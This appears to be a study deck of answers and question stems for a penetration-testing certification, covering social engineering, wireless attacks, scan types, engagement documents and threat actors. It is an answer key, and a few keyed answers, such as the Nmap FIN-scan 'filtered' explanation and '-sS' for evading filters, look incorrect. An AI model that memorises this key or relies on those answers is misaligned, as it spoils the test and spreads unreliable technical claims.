DNS cache poisoning involves manipulating the DNS resolver cache by injecting corrupted DNS data. This is done to force the DNS server to send the wrong IP address to the victim, redirecting the victim to the attacker's system.
Which of the following describes a DNS cache poisoning attack?
KARMA is a man-in-the-middle attack that involves creating a rogue AP and allowing an attacker to intercept wireless traffic.
Which of the following describes a KARMA attack?
Botnet
Which of the following describes a collection of compromised hosts that can be used to carry out multiple attacks?
SOW
Which of the following documents includes elements such as the scope of the work to be performed, the location of the work, and the payment schedule?
Rules of engagement
Which of the following documents includes the penetration testing timeline?
Blue team
Which of the following is a corporate security team that defends the organization against cybersecurity threats (such as the security operation center analysts, computer incident response teams [CSIRTs], and information security [InfoSec] teams)?
Using multiple tools of the same kind
Which of the following is a good method for validating the findings of a penetration test?
Red team
Which of the following is a group of cybersecurity experts and penetration testers that are hired by an organization to mimic a real threat actor?
War driving
Which of the following is a methodology attackers use to find wireless access points wherever they may be?
EternalBlue
Which of the following is a popular SMB exploit that has been used in ransomware?
Empire
Which of the following is a popular tool that can be used to perform golden ticket and many other types of attacks?
Mimikatz
Which of the following is a tool that many penetration testers, attackers, and even malware use for retrieving password hashes from memory and also as a useful post-exploitation tool?
KRACK
Which of the following is an attack against the WPA and WPA2 protocols?
POODLE
Which of the following is an example of a downgrade attack?
SMS phishing
Which of the following is an example of a social engineering attack that is not related to email?
The SOW defines confidential material, which is knowledge and information that should not be disclosed and should be kept confidential by both parties.
Which of the following is not true about the statement of work (SOW)?
SNMPv2c uses two authenticating credentials: The first is a public community string to view the configuration or to obtain the health status of the device, and the second is a private community string to configure the managed device. SNMPv3 authenticates SNMP users by using usernames and passwords and can protect confidentiality. SNMPv2 does not provide any confidentiality protection.
Which of the following is one of the differences between SNMPv2c and SNMPv3?
Phishing
Which of the following is the term for an attacker presenting to a user a link or an attachment that looks like a valid, trusted resource?
WEP keys exist in two sizes: 40-bit (5-byte) and 104-bit (13-byte) keys. In addition, WEP uses a 24-bit IV, which is prepended to the PSK. When you configure a wireless infrastructure device with WEP, the IVs are sent in the clear.
Which of the following is true about WEP?
An interrogator pays attention to the victim's posture, body language, skin color, and eye movement.
Which of the following is true about interrogation?
Pretexting or impersonation involves presenting yourself as someone else in order to gain access to information.
Which of the following is true about pretexting?
Scarcity can be used to create a feeling of urgency in a decision-making context. It is possible to use specific language in an interaction to present a sense of urgency and manipulate the victim.
Which of the following is true about social engineering motivation techniques?
Spear phishing consists of phishing attempts that are constructed in a very specific way and directly targeted at specific individuals or companies.
Which of the following is true about spear phishing?
The base group represents the intrinsic characteristics of a vulnerability that are constant over time and do not depend on a user-specific environment.
Which of the following is true about the base group of CVSS?
Voice phishing is also referred to as "vishing."
Which of the following is true about voice phishing?
Whaling is similar to phishing and spear phishing; however, this type of attack is targeted at high-profile business executives and key individuals within a corporation.
Which of the following is true about whaling?
Whaling is similar to phishing and spear phishing.
Which of the following is true?
TCP port 445: NetBIOS Session Service protocol, used for sharing files between different operating systems
Which of the following port descriptions is not correct?
Malvertising
Which of the following refers to the act of incorporating malicious ads on trusted websites, which results in users' browsers being inadvertently redirected to sites hosting malware?
PCI DSS must be adopted by any organization that transmits, processes, or stores payment card data or directly or indirectly affects the security of cardholder data.
Which of the following statements is true?
Ransomware
Which of the following terms describes an attack in which the end user's system hard drive or files are encrypted with a key known only to the attacker?
Recon-ng
Which of the following tools is a framework used for active open source intelligence gathering?
DNSRecon
Which of the following tools is primarily used to enumerate domain information?
Compliance scan
Which of the following vulnerability scan types would you recommend for a company that is concerned with complying with HIPAA?
Responsible disclosure
Which of the following would be a characteristic of an ethical hacker?
PCI penetration testing guidance
Which penetration testing methodology was created for the purpose of providing a minimum level of security requirements for handling credit card information?
White-box test
Which type of penetration test would provide the tester with information such as network diagrams and credentials?
Passive
Which type of reconnaissance would be used when it is imperative that the target not be able to detect your activity?
Active reconnaissance
Which type of reconnaissance would involve using tools that send network probes directly at a target device?
Hacktivist
Which type of threat actor operates with a political or social purpose to embarrass or financially affect the victim?
Organized crime
Which type of threat actor would have the primary intent of monetary gain?
Authenticated scan
Which type of vulnerability scan would require the scanner to log in to the target system and run privileged-level commands to gather results?
Black-box test
You are hired to complete a penetration test. The customer gives you only a domain name and IP address as the target information. Which type of penetration test is the customer asking you to perform?
Insider threat
You are performing a penetration test for a customer. You identify a client machine that is downloading the contents of the customer database, which stores the customer's intellectual property. You then identify an employee who is exporting the data to a USB drive. Which type of threat actor is this likely to be?
TCP FIN received
You are running an Nmap TCP FIN scan against a target device. The result of the scan indicates that port 80 is filtered. What response was likely received from the target that led to Nmap making this determination?
-sS
You are running an Nmap port scan, and it is being blocked by a network filter. Which of the following options could you try to avoid the filters?
Disclaimer
You can create a document or include text in a contract, an SOW, or your final report specifying that you conducted the penetration testing on the applications and systems that existed as of a clearly stated date. This is an example of which of the following?
A Swagger document
You can obtain several support resources from an organization that hired you to perform a penetration test. Which of the following is an example?
Web application test
Your company has an Internet-facing website that is critical to its daily business. Which type of penetration test would you prioritize?
Black-box test
Your company needs to determine if the security posture of its computing environment is sufficient for the level of exposure it receives. You determine that you will need to have a penetration test completed on the environment. You would like the testing to be done from the perspective of an external attacker. Which type of penetration test would be best?
Passive
___________ reconnaissance is a method of information gathering in which the attacker uses techniques that are not likely to be detected by the target.
Spear phishing
____________ refers to phishing attempts that are constructed in a very specific way and directly targeted at specific individuals or companies.
Packet crafting
__________________ is the method of enumeration used by the Scapy tool.